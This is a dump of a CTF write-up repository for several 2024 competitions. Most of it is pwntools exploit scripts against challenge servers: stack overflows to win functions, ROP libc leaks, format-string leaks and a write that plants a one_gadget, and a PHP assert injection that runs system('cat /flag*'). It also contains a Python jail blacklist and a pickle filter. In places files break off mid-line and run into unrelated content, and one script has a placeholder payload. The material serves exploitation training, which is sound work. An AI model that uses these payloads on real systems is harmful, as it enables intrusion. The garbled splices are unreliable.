= b"" 40 | for i in range(5): 41 | flag += (traces[i + 1] - traces[0]).to_bytes(length=5, byteorder="big") 42 | 43 | print(flag.decode()) # uiuctf{tr4c1ng_&&_mult5!} 44 | -------------------------------------------------------------------------------- /2024_06_29_UIUCTFCTF24/crypto/x_marked_the_spot/ct: -------------------------------------------------------------------------------- 1 |  X6S. Z.^; 9^]T6 2 | U5BHPCGK -------------------------------------------------------------------------------- /2024_06_29_UIUCTFCTF24/crypto/x_marked_the_spot/go.py: -------------------------------------------------------------------------------- 1 | import struct 2 | from itertools import cycle 3 | 4 | with open("ct", "rb") as file: 5 | ct = file.read() 6 | 7 | key = b"" 8 | for i, c in enumerate("uiuctf{"): 9 | key += struct.pack("B", ct[i] ^ ord(c)) 10 | 11 | key += struct.pack("B", ct[-1] ^ ord("}")) 12 | 13 | pt = bytes(x ^ y for x, y in zip(ct, cycle(key))) 14 | 15 | print(pt.decode()) # uiuctf{n0t_ju5t_th3_st4rt_but_4l50_th3_3nd!!!!!} 16 | -------------------------------------------------------------------------------- /2024_06_29_UIUCTFCTF24/crypto/x_marked_the_spot/public.py: -------------------------------------------------------------------------------- 1 | from itertools import cycle 2 | 3 | flag = b"uiuctf{????????????????????????????????????????}" 4 | # len(flag) = 48 5 | key = b"????????" 6 | # len(key) = 8 7 | ct = bytes(x ^ y for x, y in zip(flag, cycle(key))) 8 | 9 | with open("ct", "wb") as ct_file: 10 | ct_file.write(ct) 11 | -------------------------------------------------------------------------------- /2024_06_29_UIUCTFCTF24/crypto/x_marked_the_spot/writeup.md: -------------------------------------------------------------------------------- 1 | https://ctftime.org/event/2275 2 | 3 | # X Marked the Spot (crypto) 4 | 5 | A perfect first challenge for beginners. Who said pirates can't ride trains... 6 | 7 | ## Solution 8 | 9 | The flag is xored with the key. 
10 | 11 | We know that the flag format is `uiuctf{.+}`. 12 | 13 | This means we can recover the first 7 bytes of the keystream by xoring it with `uiuctf{`. 14 | 15 | We can obtain the final byte of the keystream two ways: 16 | 17 | 1) Notice that the length of the ciphertext, and therefore the plaintext, is a multiple of 8. This means that the 8th byte of the key was used to encrypt `"}"` 18 | 2) Simply try all possible values for the final byte of the key, optionally limiting this to `string.printable`, and look for a plaintext that ends with `"}"` 19 | 20 | ```python 21 | import struct 22 | from itertools import cycle 23 | 24 | with open("ct", "rb") as file: 25 | ct = file.read() 26 | 27 | key = b"" 28 | for i, c in enumerate("uiuctf{"): 29 | key += struct.pack("B", ct[i] ^ ord(c)) 30 | 31 | key += struct.pack("B", ct[-1] ^ ord("}")) 32 | 33 | pt = bytes(x ^ y for x, y in zip(ct, cycle(key))) 34 | 35 | print(pt.decode()) 36 | ``` 37 | 38 | ## Flag 39 | `uiuctf{n0t_ju5t_th3_st4rt_but_4l50_th3_3nd!!!!!}` 40 | 41 | smiley 2024/06/30 42 | -------------------------------------------------------------------------------- /2024_06_29_UIUCTFCTF24/misc/push_and_pickle/chal.py: -------------------------------------------------------------------------------- 1 | import pickle 2 | import base64 3 | import sys 4 | import pickletools 5 | 6 | def check_flag(flag_guess: str): 7 | """REDACTED FOR PRIVACY""" 8 | 9 | cucumber = base64.b64decode(input("Give me your best pickle (base64 encoded) to taste! ")) 10 | 11 | for opcode, _, _ in pickletools.genops(cucumber): 12 | if opcode.code == "c" or opcode.code == "\x93": 13 | print("Eww! 
I can't eat dill pickles.") 14 | sys.exit(0) 15 | 16 | pickle.loads(cucumber) 17 | -------------------------------------------------------------------------------- /2024_06_29_UIUCTFCTF24/pwn/syscalls/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:22.04 as chroot 2 | FROM gcr.io/kctf-docker/challenge@sha256:eb0f8c3b97460335f9820732a42702c2fa368f7d121a671c618b45bbeeadab28 3 | 4 | COPY --from=chroot / /chroot 5 | RUN mkdir -p /chroot/home/user 6 | COPY ./syscalls /chroot/home/user 7 | COPY ./flag.txt /chroot/home/user 8 | 9 | COPY nsjail.cfg /home/user/ 10 | 11 | CMD kctf_setup && \ 12 | kctf_drop_privs \ 13 | socat \ 14 | TCP-LISTEN:1337,reuseaddr,fork \ 15 | EXEC:"kctf_pow nsjail --config /home/user/nsjail.cfg -- /home/user/syscalls" 16 | -------------------------------------------------------------------------------- /2024_06_29_UIUCTFCTF24/pwn/syscalls/Dockerfile.local: -------------------------------------------------------------------------------- 1 | # admins provided this during the ctf as the Dockerfile given with the task 2 | # is missing the nsjail config and can't be easily used 3 | 4 | FROM ubuntu:22.04 5 | RUN apt-get update && apt-get -y install socat 6 | RUN mkdir -p /chroot/home/user 7 | COPY ./syscalls /chroot/home/user 8 | COPY ./flag.txt /chroot/home/user 9 | CMD socat TCP-LISTEN:1337,reuseaddr,fork EXEC:"/chroot/home/user/syscalls" 10 | -------------------------------------------------------------------------------- /2024_06_29_UIUCTFCTF24/pwn/syscalls/syscalls: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_06_29_UIUCTFCTF24/pwn/syscalls/syscalls -------------------------------------------------------------------------------- /2024_07_06_DUCTF24/README.md: -------------------------------------------------------------------------------- 1 | # DUCTF 2024 
Writeups 2 | 3 | https://ctftime.org/event/2284 4 | 5 | 647th place 809 points 6 | -------------------------------------------------------------------------------- /2024_07_06_DUCTF24/pwn/vector_overflow/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./vector_overflow", checksec=False) 7 | context.binary = elf 8 | 9 | #p = elf.process() 10 | #p = elf.debug(gdbscript="") 11 | p = remote("2024.ductf.dev", 30013) 12 | 13 | BUF = 0x4051e0 14 | 15 | payload = b"" 16 | payload += b"DUCTF" 17 | payload += b"\x00" * 11 # fill up to 16 bytes 18 | payload += p64(BUF) # v.start 19 | payload += p64(BUF + 5) # v.end 20 | payload += p64(BUF + 5) # v.capacity 21 | 22 | p.sendline(payload) 23 | 24 | p.interactive() 25 | -------------------------------------------------------------------------------- /2024_07_06_DUCTF24/pwn/vector_overflow/vector_overflow: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_07_06_DUCTF24/pwn/vector_overflow/vector_overflow -------------------------------------------------------------------------------- /2024_07_06_DUCTF24/pwn/vector_overflow/vector_overflow.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | char buf[16]; 7 | std::vector v = {'X', 'X', 'X', 'X', 'X'}; 8 | 9 | void lose() { 10 | puts("Bye!"); 11 | exit(1); 12 | } 13 | 14 | void win() { 15 | system("/bin/sh"); 16 | exit(0); 17 | } 18 | 19 | int main() { 20 | char ductf[6] = "DUCTF"; 21 | char* d = ductf; 22 | 23 | std::cin >> buf; 24 | if(v.size() == 5) { 25 | for(auto &c : v) { 26 | if(c != *d++) { 27 | lose(); 28 | } 29 | } 30 | 31 | win(); 32 | } 33 | 34 | lose(); 35 | } 36 | 
-------------------------------------------------------------------------------- /2024_07_06_DUCTF24/pwn/yawa/ld-linux-x86-64.so.2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_07_06_DUCTF24/pwn/yawa/ld-linux-x86-64.so.2 -------------------------------------------------------------------------------- /2024_07_06_DUCTF24/pwn/yawa/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_07_06_DUCTF24/pwn/yawa/libc.so.6 -------------------------------------------------------------------------------- /2024_07_06_DUCTF24/pwn/yawa/yawa: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_07_06_DUCTF24/pwn/yawa/yawa -------------------------------------------------------------------------------- /2024_07_06_DUCTF24/pwn/yawa/yawa.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | void init() { 6 | setvbuf(stdin, 0, 2, 0); 7 | setvbuf(stdout, 0, 2, 0); 8 | } 9 | 10 | int menu() { 11 | int choice; 12 | puts("1. Tell me your name"); 13 | puts("2. 
Get a personalised greeting"); 14 | printf("> "); 15 | scanf("%d", &choice); 16 | return choice; 17 | } 18 | 19 | int main() { 20 | init(); 21 | 22 | char name[88]; 23 | int choice; 24 | 25 | while(1) { 26 | choice = menu(); 27 | if(choice == 1) { 28 | read(0, name, 0x88); 29 | } else if(choice == 2) { 30 | printf("Hello, %s\n", name); 31 | } else { 32 | break; 33 | } 34 | } 35 | } 36 | -------------------------------------------------------------------------------- /2024_07_06_DUCTF24/rev/number_mashing/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | from z3 import * 5 | 6 | x = BitVec('x', 32) # local_11c 7 | y = BitVec('y', 32) # local_118 8 | 9 | s = Solver() 10 | 11 | s.add(x != 0) 12 | s.add(y != 0) 13 | s.add(y != 1) 14 | s.add(x == (x / y)) 15 | 16 | s.check() 17 | m = s.model() 18 | 19 | p = remote("2024.ductf.dev", 30014) 20 | 21 | p.sendline(f"{m[x].as_long()} {m[y].as_long()}".encode()) # 2147483648 4294967295 22 | 23 | p.interactive() # DUCTF{w0w_y0u_just_br0ke_math!!} 24 | -------------------------------------------------------------------------------- /2024_07_06_DUCTF24/rev/number_mashing/number-mashing: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_07_06_DUCTF24/rev/number_mashing/number-mashing -------------------------------------------------------------------------------- /2024_07_06_DUCTF24/rev/number_mashing/writeup.md: -------------------------------------------------------------------------------- 1 | https://ctftime.org/event/2284 2 | 3 | # number mashing (crypto) 4 | 5 | Mash your keyboard numpad in a specific order and a flag might just pop out! 
6 | 7 | nc 2024.ductf.dev 30014 8 | 9 | ## Analysis 10 | 11 | The code in the binary roughly decompiles to the following: 12 | 13 | ```c 14 | int x, y; 15 | scanf("%d %d", &x, &y); 16 | assert(x != 0 && y != 0 && y != 1); 17 | assert(x == (x / y)); 18 | ``` 19 | 20 | ## Solution 21 | 22 | 1) Use z3 to solve for the constraints in the binary 23 | 2) Supply the inputs that satisfy the model 24 | 3) Wonder if the task was actually trying to teach you something about how numbers work: the two values z3 returns are the 32-bit patterns `0x80000000` and `0xffffffff`, which a signed `int` reads as `INT_MIN` and `-1`, and `INT_MIN / -1` does not fit in an `int` (undefined behaviour in C), so the quotient can come back as `INT_MIN` again 25 | 26 | ```python 27 | #!/usr/bin/env python3 28 | 29 | from pwn import * 30 | from z3 import * 31 | 32 | x = BitVec('x', 32) # local_11c 33 | y = BitVec('y', 32) # local_118 34 | 35 | s = Solver() 36 | 37 | s.add(x != 0) 38 | s.add(y != 0) 39 | s.add(y != 1) 40 | s.add(x == (x / y)) 41 | 42 | s.check() 43 | m = s.model() 44 | 45 | p = remote("2024.ductf.dev", 30014) 46 | 47 | p.sendline(f"{m[x].as_long()} {m[y].as_long()}".encode()) # 2147483648 4294967295 48 | 49 | p.interactive() # DUCTF{w0w_y0u_just_br0ke_math!!} 50 | ``` 51 | 52 | ## Flag 53 | `DUCTF{w0w_y0u_just_br0ke_math!!}` 54 | 55 | smiley 2024/07/06 56 | -------------------------------------------------------------------------------- /2024_07_13_OSCTF24/README.md: -------------------------------------------------------------------------------- 1 | # OSCTF 2024 Writeups 2 | 3 | https://ctftime.org/event/2416 4 | 5 | 194th place 1565 points 6 | -------------------------------------------------------------------------------- /2024_07_13_OSCTF24/pwn/buffer_buffet/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./vuln", checksec=False) 7 | context.binary = elf 8 | 9 | #p = elf.process() 10 | #p = elf.debug(gdbscript="") 11 | p = remote("34.125.199.248", 4056) 12 | 13 | p.readline() 14 | 15 | payload = b"A" * 0x198 16 | payload += p64(elf.sym["secretFunction"]) 17 | 18 | p.sendline(payload) 
19 | 20 | p.readuntil(b"Flag: ") 21 | 22 | flag = p.readline() 23 | 24 | log.success(flag.decode()) # OSCTF{buff3r_buff3t_w4s_e4sy!} 25 | -------------------------------------------------------------------------------- /2024_07_13_OSCTF24/pwn/buffer_buffet/vuln: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_07_13_OSCTF24/pwn/buffer_buffet/vuln -------------------------------------------------------------------------------- /2024_07_13_OSCTF24/pwn/buffer_buffet/writeup.md: -------------------------------------------------------------------------------- 1 | https://ctftime.org/event/2416 2 | 3 | # buffer_buffet (pwn) 4 | 5 | As an elite hacker invited to an exclusive digital banquet, you must navigate through the layers of a complex software system. Among the appetizers, main course, and dessert lies a hidden entry point that, when discovered, reveals a treasure trove of sensitive information. 
6 | 7 | nc 34.125.199.248 4056 8 | 9 | ## Solution 10 | 11 | 1) ret2win @ `secretFunction` 12 | 13 | ```python 14 | #!/usr/bin/env python3 15 | 16 | from pwn import * 17 | 18 | #context.log_level = "debug" 19 | elf = ELF("./vuln", checksec=False) 20 | context.binary = elf 21 | 22 | #p = elf.process() 23 | #p = elf.debug(gdbscript="") 24 | p = remote("34.125.199.248", 4056) 25 | 26 | p.readline() 27 | 28 | payload = b"A" * 0x198 29 | payload += p64(elf.sym["secretFunction"]) 30 | 31 | p.sendline(payload) 32 | 33 | p.readuntil(b"Flag: ") 34 | 35 | flag = p.readline() 36 | 37 | log.success(flag.decode()) # OSCTF{buff3r_buff3t_w4s_e4sy!} 38 | ``` 39 | 40 | ## Flag 41 | `OSCTF{buff3r_buff3t_w4s_e4sy!}` 42 | 43 | smiley 2024/07/13 44 | -------------------------------------------------------------------------------- /2024_07_13_OSCTF24/pwn/byte_breakup/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | import struct 5 | 6 | #context.log_level = "debug" 7 | elf = ELF("./vuln_patched", checksec=False) 8 | context.binary = elf 9 | 10 | libc = ELF("./libc.so.6", checksec=False) 11 | 12 | #p = elf.process() 13 | #p = elf.debug(gdbscript="") 14 | p = remote("34.125.199.248", 6969) 15 | 16 | p.readuntil(b"password: \n") 17 | 18 | rop = ROP(elf) 19 | rop.raw(b"A" * 0x28) 20 | rop.rdi = elf.got["puts"] 21 | rop.call(elf.plt["puts"]) 22 | rop.call(elf.sym["main"]) 23 | p.sendline(rop.chain()) 24 | 25 | p.readline() 26 | p.readline() 27 | 28 | leak = struct.unpack(" ") 16 | p.send(b"A" * 32) 17 | p.readuntil(b"Ok... its name is ") 18 | p.read(32) 19 | 20 | canary = p.read(8) 21 | log.success(canary.hex()) 22 | 23 | p = remote("34.125.199.248", 5674) 24 | p.sendline(str(0x38 + 2).encode()) 25 | 26 | p.readuntil(b"> ") 27 | 28 | payload = b"" 29 | payload += b"B" * 32 30 | payload += canary 31 | payload += b"\x00" * 16 32 | payload += b"\x??\x??" 
# unclear what this should be 33 | p.send(payload) 34 | 35 | p.interactive() 36 | -------------------------------------------------------------------------------- /2024_07_13_OSCTF24/pwn/leaky_pipes/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./leaky_pipes", checksec=False) 7 | context.binary = elf 8 | 9 | #p = elf.process() 10 | #p = elf.debug(gdbscript="") 11 | p = remote("34.125.199.248", 1337) 12 | 13 | p.readuntil(b">> ") 14 | 15 | p.sendline(b"%36$p.%37$p.%38$p.%39$p.%40$p.%41$p.%42$p.%43$p.%44$p.") 16 | 17 | p.readline() 18 | 19 | dwords = p.readline().decode().split(".")[:-1] 20 | 21 | flag = b"" 22 | for dword in dwords: 23 | flag += int(dword, 16).to_bytes(length=4, byteorder="little") 24 | 25 | flag = flag[:flag.index(b"}")+1] 26 | 27 | log.success(flag.decode()) # OSCTF{F0rm4t_5tr1ngs_l3ak4g3_l0l} 28 | -------------------------------------------------------------------------------- /2024_07_13_OSCTF24/pwn/leaky_pipes/leaky_pipes: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_07_13_OSCTF24/pwn/leaky_pipes/leaky_pipes -------------------------------------------------------------------------------- /2024_07_13_OSCTF24/pwn/leaky_pipes/writeup.md: -------------------------------------------------------------------------------- 1 | https://ctftime.org/event/2416 2 | 3 | # leaky_pipes (pwn) 4 | 5 | Welcome to Leaky Pipes, where a seemingly innocent program has sprung a serious leak! Your mission is to uncover the concealed flag hidden within the program. Will you be the one to patch the leak and reveal the hidden secret? 
6 | 7 | nc 34.125.199.248 1337 8 | 9 | ## Solution 10 | 11 | 1) Leak the flag 4 bytes at a time using `%p`: the input is used as a format string, so each positional specifier (`%36$p` to `%44$p` in the script below) prints one stack slot holding part of the flag 12 | 13 | ```python 14 | #!/usr/bin/env python3 15 | 16 | from pwn import * 17 | 18 | #context.log_level = "debug" 19 | elf = ELF("./leaky_pipes", checksec=False) 20 | context.binary = elf 21 | 22 | #p = elf.process() 23 | #p = elf.debug(gdbscript="") 24 | p = remote("34.125.199.248", 1337) 25 | 26 | p.readuntil(b">> ") 27 | 28 | p.sendline(b"%36$p.%37$p.%38$p.%39$p.%40$p.%41$p.%42$p.%43$p.%44$p.") 29 | 30 | p.readline() 31 | 32 | dwords = p.readline().decode().split(".")[:-1] 33 | 34 | flag = b"" 35 | for dword in dwords: 36 | flag += int(dword, 16).to_bytes(length=4, byteorder="little") 37 | 38 | flag = flag[:flag.index(b"}")+1] 39 | 40 | log.success(flag.decode()) # OSCTF{F0rm4t_5tr1ngs_l3ak4g3_l0l} 41 | ``` 42 | 43 | ## Flag 44 | `OSCTF{F0rm4t_5tr1ngs_l3ak4g3_l0l}` 45 | 46 | smiley 2024/07/13 47 | -------------------------------------------------------------------------------- /2024_07_13_OSCTF24/pwn/lib_riddle/challenge: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_07_13_OSCTF24/pwn/lib_riddle/challenge -------------------------------------------------------------------------------- /2024_07_13_OSCTF24/pwn/lib_riddle/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | import struct 5 | 6 | #context.log_level = "debug" 7 | elf = ELF("./challenge", checksec=False) 8 | context.binary = elf 9 | 10 | libc = ELF("./libc.so.6", checksec=False) 11 | 12 | #p = elf.process() 13 | #p = elf.debug(gdbscript="") 14 | p = remote("34.125.199.248", 7809) 15 | 16 | p.readuntil(b"What's your name?\n") 17 | 18 | rop = ROP(elf) 19 | rop.raw('A' * 0x18) 20 | rop.puts(elf.got['puts']) 21 | rop.raw(elf.sym['main']) 22 | p.sendline(rop.chain()) 23 | 24 | 
p.readline() 25 | p.readline() 26 | leak = struct.unpack("','<','{','}','class','global','var','local','import','exec','eval','t','set','blacklist'] 6 | while True: 7 | inp = input("Enter input: ") 8 | for i in blacklist: 9 | if i in inp: 10 | print("ok nice") 11 | exit(0) 12 | for i in inp: 13 | if (ord(i) > 125) or (ord(i) < 40) or (len(set(inp))>17): 14 | print("ok nice") 15 | exit(0) 16 | try: 17 | eval(inp,{'__builtins__':None,'ord':ord,'flag':flag}) 18 | print("ok nice") 19 | except: 20 | print("error") 21 | -------------------------------------------------------------------------------- /2024_07_19_Imaginary24/misc/starship/files.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_07_19_Imaginary24/misc/starship/files.zip -------------------------------------------------------------------------------- /2024_07_19_Imaginary24/misc/starship/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | p = remote("starship.chal.imaginaryctf.org", 1337) 7 | 8 | p.sendlineafter(b"> ", b"4") 9 | 10 | p.readuntil(b"target 1: ") 11 | 12 | target1 = p.readline().decode().split("|")[0][:-1].split(",") 13 | 14 | p.readuntil(b"target 2: ") 15 | 16 | target2 = p.readline().decode().split("|")[0][:-1].split(",") 17 | 18 | between = "" 19 | for i in range(9): 20 | between += f"{(int(target1[i]) + int(target2[i])) // 2}," 21 | between += "friendly" 22 | 23 | p.sendlineafter(b"> ", b"42") 24 | p.sendlineafter(b"enter data: ", between.encode()) 25 | 26 | p.sendlineafter(b"> ", b"2") 27 | 28 | p.sendlineafter(b"> ", b"4") 29 | 30 | p.readline() 31 | p.readline() 32 | 33 | log.success(p.readline().decode()) # ictf{m1ssion_succ3ss_8fac91385b77b026} 34 | 
#!/usr/bin/env python3
"""Solve script for the imgstore challenge.

Listing path: /2024_07_19_Imaginary24/pwn/imgstore/go.py
Challenge files:
https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_07_19_Imaginary24/pwn/imgstore/files.zip

The script sends format specifiers as the "book title" and reads addresses
back, so the service apparently passes that title to a printf-style function
as the format argument.  It runs in three steps:

1. leak one stack value and one libc value with ``%p`` specifiers,
2. rewrite the low three bytes of a saved return address in two writes,
3. answer ``n`` so the function returns through the rewritten address.

Defensive takeaway: user-controlled text must never be the format argument.
A constant format such as ``printf("%s", title)`` removes both the leak and
the write, and ``-Wformat -Wformat-security`` reports the pattern at build time.
"""

from pwn import *

#context.log_level = "debug"
elf = ELF("./imgstore_patched", checksec=False)
context.binary = elf

libc = ELF("./libc.so.6", checksec=False)

#io = elf.process()
#io = elf.debug(gdbscript="")
io = remote("imgstore.chal.imaginaryctf.org", 1337)

TITLE_PROMPT = b"Enter book title: "
AGAIN_PROMPT = b"[y/n]: "
FMT_OFFSET = 8  # first argument the original passes to fmtstr_payload()


def write_bytes(address, data):
    """Ask for another title and use it to store `data` at `address`."""
    io.sendlineafter(AGAIN_PROMPT, b"y")
    io.readuntil(TITLE_PROMPT)
    io.sendline(fmtstr_payload(FMT_OFFSET, {address: data}))


# Menu entry 3 is the one that asks for a book title.
io.sendlineafter(b">> ", b"3")
io.sendlineafter(TITLE_PROMPT, b"%p.%p.%25$p")

# The reply after "--> " holds the three leaked values, separated by dots.
io.readuntil(b"--> ")
fields = io.readline().decode().split(".")

# NOTE(review): 10040 and 0x0024083 are fixed offsets for this binary and this
# libc.so.6; presumably the distance from the leaked stack value to the saved
# return address, and from the leaked libc value to the libc base -- confirm.
target_slot = int(fields[0], 16) + 10040
libc.address = int(fields[2], 16) - 0x0024083

# Partial rewrite of a libc return address, done in two stages.
one_gadget = libc.address + 0xe3b01

write_bytes(target_slot, p8(one_gadget & 0xff))                   # first byte only
write_bytes(target_slot + 1, p16((one_gadget >> 8) & 0xffff))     # bytes two and three

io.sendlineafter(AGAIN_PROMPT, b"n")  # leave the loop so the function returns

io.sendline(b"/bin/cat flag.txt")

io.interactive()  # ictf{b4byy_f3rM4T_5Tr1nn66S}

# Next file in this listing: /2024_07_19_Imaginary24/web/journal/writeup.md
-------------------------------------------------------------------------------- 1 | https://ctftime.org/event/2396 2 | 3 | # journal (web) 4 | 5 | one file php challenge 6 | 7 | ## Solution 8 | 9 | At first I thought it was an include-path problem. 10 | But after trying every byte, some responses contained interesting error messages about `assert`. 11 | That turns out to be a well-known issue: older PHP versions evaluate a string passed to `assert()` as code, so request data concatenated into that string gets executed (the challenge source is not reproduced here, so this is inferred from the error messages): 12 | https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/php-tricks-esp 13 | 14 | ```python 15 | import requests 16 | 17 | payload = "file1.txt' and die(system(\"cat /flag*\")) or '" 18 | res = requests.get("http://journal.chal.imaginaryctf.org/", params={"file":payload}) 19 | print(f"DEBUGPRINT[1]: go.py:14: res.text={res.text}") 20 | ``` 21 | 22 | ## Flag 23 | `ictf{assertion_failed_e3106922feb13b10}` 24 | 25 | shafouz 2024/07/21 26 | -------------------------------------------------------------------------------- /2024_07_26_DeadSecCTF24/README.md: -------------------------------------------------------------------------------- 1 | # DeadSec 2024 Writeups 2 | 3 | https://ctftime.org/event/2353 4 | 5 | 314th place 200 points 6 | -------------------------------------------------------------------------------- /2024_07_26_DeadSecCTF24/crypto/flag_killer/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | from binascii import unhexlify 6 | 7 | with open("./enc.txt", "r") as f: 8 | enc = f.read() 9 | 10 | letters = [] 11 | for i in range(0, len(enc), 5): 12 | letters.append(enc[i:i+5]) 13 | 14 | def FLAG_KILLER(value): 15 | index = 0 16 | temp = [] 17 | output = 0 18 | while value > 0: 19 | temp.append(2 - (value % 4) if value % 2 != 0 else 0) 20 | value = (value - temp[index])/2 21 | index += 1 22 | temp = temp[::-1] 23 | for index in range(len(temp)): 24 | output += temp[index] * 3 ** (len(temp) - index - 1) 25 | return output 26 | 27 | flag = 0 28 | 29 | for i in range(len(letters)): 
30 | for j in range(0x1000): 31 | if (FLAG_KILLER(j) == int(letters[i], 16)): 32 | flag = (flag << 12) + j 33 | 34 | flag = unhexlify(hex(flag)[2:] + "0")[:-2] + b"}" 35 | 36 | print(flag.decode()) # DEAD{263f871e880e9dc7d2401000304fc60e98c7c588} -------------------------------------------------------------------------------- /2024_07_26_DeadSecCTF24/crypto/flag_killer/public.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_07_26_DeadSecCTF24/crypto/flag_killer/public.zip -------------------------------------------------------------------------------- /2024_07_26_DeadSecCTF24/pwn/super_cpp_calculator/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./test", checksec=False) 7 | context.binary = elf 8 | 9 | #p = elf.process() 10 | #p = elf.debug(gdbscript="b *0x0000000000401716") 11 | p = remote("34.30.75.212", 32059) 12 | 13 | p.sendlineafter(b">", b"1") 14 | p.sendlineafter(b"> ", b"1.2") 15 | p.sendlineafter(b"> ", b"0.00012") 16 | 17 | p.sendlineafter(b"> ", b"1337") 18 | p.readline() 19 | payload = b"" 20 | payload += b"A" * 0x408 21 | payload += p64(elf.sym["_Z3winv"] + 8) 22 | p.sendlineafter(b"> ", payload) 23 | 24 | p.sendline(b"/bin/cat flag.txt") 25 | 26 | log.success(p.readline().decode()) # DEAD{so_ez_pwn_hehe} 27 | -------------------------------------------------------------------------------- /2024_07_26_DeadSecCTF24/pwn/super_cpp_calculator/public.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_07_26_DeadSecCTF24/pwn/super_cpp_calculator/public.zip -------------------------------------------------------------------------------- 
/2024_08_03_TFCCTF24/README.md: -------------------------------------------------------------------------------- 1 | # TFCCTF 2024 Writeups 2 | 3 | https://ctftime.org/event/2423 4 | 5 | 32nd place 2552 points 6 | -------------------------------------------------------------------------------- /2024_08_03_TFCCTF24/crypto/biased_elections/biased_elections.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_08_03_TFCCTF24/crypto/biased_elections/biased_elections.zip -------------------------------------------------------------------------------- /2024_08_03_TFCCTF24/crypto/ccccc/ccccc.txt: -------------------------------------------------------------------------------- 1 | 5c4c4c6c4c3c4c3c5c4c4c6c7cbc6c3c7c3c6c8c6cfc7c5c7c4c5cfc6c3c6cfc7c5c7c4c5cfc6c3c7c4c3c0c5cfc6c3c6cdc7c9c5cfc6c3c6c2c3c0c7c9c5cfc6c3c3c4c6cec6c4c5cfc6c3c6cdc7c9c5cfc6c3c6c4c6cfc6c7c5cfc6c3c6c1c6cec6c4c5cfc6c3c6cdc7c9c5cfc6c3c6c3c3c4c3c7c7cdc0ca 2 | -------------------------------------------------------------------------------- /2024_08_03_TFCCTF24/crypto/ccccc/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from binascii import unhexlify 4 | 5 | with open("ccccc.txt", "r") as f: 6 | c = f.read() 7 | 8 | flag = "" 9 | for i in range(0, len(c), 2): 10 | flag += c[i] 11 | 12 | flag = unhexlify(flag)[:-1].decode() 13 | 14 | print(flag) # TFCCTF{cshout_cout_ct0_cmy_cb0y_c4nd_cmy_cdog_cand_cmy_cc47} 15 | -------------------------------------------------------------------------------- /2024_08_03_TFCCTF24/crypto/ccccc/writeup.md: -------------------------------------------------------------------------------- 1 | https://ctftime.org/event/2423 2 | 3 | # ccccc (crypto) 4 | 5 | CCCCC CCCCC CCCCC CCCCC CCCCC CCCCC CCCCC CCCCC CCCCC CCCCC CCCCC CCCCC 6 | 7 | CCCCC CCCCC CCCCC 8 | 9 | ## Solution 10 | 11 | 
